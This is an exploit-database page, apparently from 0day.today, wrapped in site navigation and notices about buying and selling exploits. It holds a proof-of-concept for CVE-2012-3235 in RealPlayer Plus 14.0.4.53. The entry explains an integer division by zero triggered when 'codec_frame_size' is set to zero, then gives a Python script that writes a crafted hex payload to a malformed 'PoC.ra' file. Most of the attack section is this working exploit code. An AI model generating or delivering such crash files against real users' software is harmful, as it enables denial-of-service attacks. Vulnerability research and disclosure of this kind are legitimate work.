0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
RealPlayer Plus 14.0.4.53 RealAudio Integer Division
[# Title : RealPlayer Plus 14.0.4.53 RealAudio Integer Division By Zero
# CVE : 2012-3235
# References : http://service.real.com/realplayer/security/06292012_player/en/
# Auther : Senator of Pirates
# E-Mail : Senator.of.Pirates.team@gmail.com
# FaceBook : /SenatorofPiratesInfo
# Greeting : Morocco
# Bug:
-----
integer division by zero during the handling of RealAudio file causedby some fields
are under our control "has_interleave_pattern_flag" and "codec_frame_size".
"Has_interleave_pattern_flag" if this field is 1, then an interleave pattern follows this flag.
The total number of entries in the interleave pattern is "interleave_block_size" * "interleave_factor" / "codec_frame_size".
Vulnerable point is here, because we controlled value of "codec_frame_size field" and will be dividing
so if the value is 0 with division we will met an “integer division by zero” error.
if (header_has_interleave_pattern_flag != 0) {
num_frames_in_superblock = (interleave_factor *
interleave_block_size) / codec_frame_size;
for (i = 0; i < num_frames_in_superblock; i++)
# The Code:
-------------
code = ("\x2E\x52\x4D\x46\x00\x00\x00\x12\x00\x01\x00\x00\x00\x00\x00\x00\x00\x06\x50\x52\x4F\x50\x00\x00"
"\x00\x32\x00\x00\x00\x01\xF4\x00\x00\x01\xF4\x00\x00\x00\x05\x77\x00\x00\x04\x8B\x00\x00\x04\x12"
"\x00\x01\x27\xDE\x00\x00\x00\xF3\x00\x12\xB2\x1A\x00\x00\x02\x55\x00\x02\x00\x09\x43\x4F\x4E\x54"
"\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x44\x50\x52\x00\x00\x00\x9F\x00\x00"
"\x00\x00\x00\x01\xF4\x00\x00\x01\xF4\x00\x00\x00\x05\x77\x00\x00\x04\x8B\x00\x00\x00\x00\x00\x00"
"\x00\xF3\x00\x01\x27\xDE\x0C\x41\x75\x64\x69\x6F\x20\x53\x74\x72\x65\x61\x6D\x14\x61\x75\x64\x69"
"\x6F\x2F\x78\x2D\x70\x6E\x2D\x72\x65\x61\x6C\x61\x75\x64\x69\x6F\x00\x00\x00\x51\x2E\x72\x61\xFD"
"\x00\x05\x00\x00\x2E\x72\x61\x35\x00\x00\x00\x10\x00\x05\x00\x00\x00\x41\x00\x02\x00\x00\x01\x73"
"\x00\x00\x00\x00\x00\x0E\xA6\x00\x00\x00\x00\x00\x00\x01\x01\x73");
code += ("\x00\x00"); # codec_frame_size
code += ("\x00\x00\x00\x00\xAC\x44\x00\x00\xAC\x44\x00\x00\x00\x10\x00\x02\x76\x62\x72\x73\x72\x61\x61\x63"
"\x01\x07\x00");
code += ("\x01"); # header_has_interleave_pattern_flag
code += ("\x00\x00\x00\x03\x02\x12\x10\x4D\x44\x50\x52\x00\x00\x01\x60\x00\x00\x00\x01\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x6C\x6F\x67\x69\x63\x61\x6C\x2D\x66\x69\x6C\x65\x69\x6E\x66\x6F\x00\x00\x01\x22\x00\x00\x01"
"\x22\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x2F\x00\x00\x09\x41\x75\x64\x69\x65\x6E\x63\x65"
"\x73\x00\x00\x00\x02\x00\x19\x64\x74\x64\x72\x69\x76\x65\x5F\x63\x75\x73\x74\x6F\x6D\x5F\x61\x75"
"\x64\x69\x65\x6E\x63\x65\x3B\x00\x00\x00\x00\x1C\x00\x00\x09\x61\x75\x64\x69\x6F\x4D\x6F\x64\x65"
"\x00\x00\x00\x02\x00\x06\x6D\x75\x73\x69\x63\x00\x00\x00\x00\x2D\x00\x00\x0D\x43\x72\x65\x61\x74"
"\x69\x6F\x6E\x20\x44\x61\x74\x65\x00\x00\x00\x02\x00\x13\x36\x2F\x33\x30\x2F\x32\x30\x31\x32\x20"
"\x31\x36\x3A\x35\x34\x3A\x33\x33\x00\x00\x00\x00\x50\x00\x00\x0C\x47\x65\x6E\x65\x72\x61\x74\x65"
"\x64\x20\x42\x79\x00\x00\x00\x02\x00\x37\x48\x65\x6C\x69\x78\x20\x50\x72\x6F\x64\x75\x63\x65\x72"
"\x20\x53\x44\x4B\x20\x31\x31\x2E\x31\x20\x66\x6F\x72\x20\x57\x69\x6E\x64\x6F\x77\x73\x2C\x20\x42"
"\x75\x69\x6C\x64\x20\x31\x31\x2E\x31\x2E\x30\x2E\x32\x38\x39\x35\x00\x00\x00\x00\x31\x00\x00\x11"
"\x4D\x6F\x64\x69\x66\x69\x63\x61\x74\x69\x6F\x6E\x20\x44\x61\x74\x65\x00\x00\x00\x02\x00\x13\x36"
"\x2F\x33\x30\x2F\x32\x30\x31\x32\x20\x31\x36\x3A\x35\x34\x3A\x33\x33\x00\x00\x00\x00\x1D\x00\x00"
"\x09\x76\x69\x64\x65\x6F\x4D\x6F\x64\x65\x00\x00\x00\x02\x00\x07\x6E\x6F\x72\x6D\x61\x6C\x00\x44"
"\x41\x54\x41\x00\x12\xAF\xC5\x00\x00\x00\x00\x04\x12\x00\x00\x00\x00\x00\x00\x04\xDF\x00\x00\x00"
"\x00\x00\x00\x00\x02\x00\x30\x01\x72\x01\x72\x01\xE7\x21\x1A\xC5\x00\x7D\x8B\x94\xA7\x37\xA0\xA8"
"\x03\xEC\x5C\xA7\x39\xBC\xC8\x3D\xBF\xFC\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00");
try:
A = open("PoC.ra","wb")
A.write(code)
A.close()
print "[*] The file created [*]"
except:
print "[*] Error while creating file [*]"
print "[*] Enter to continue.. [*]"
raw_input()
# Fix:
-----
I contacted RealNetwork and they told me this issue is fixed in RealPlayer 15.0.5.109.
# 0day.today [2024-11-15] #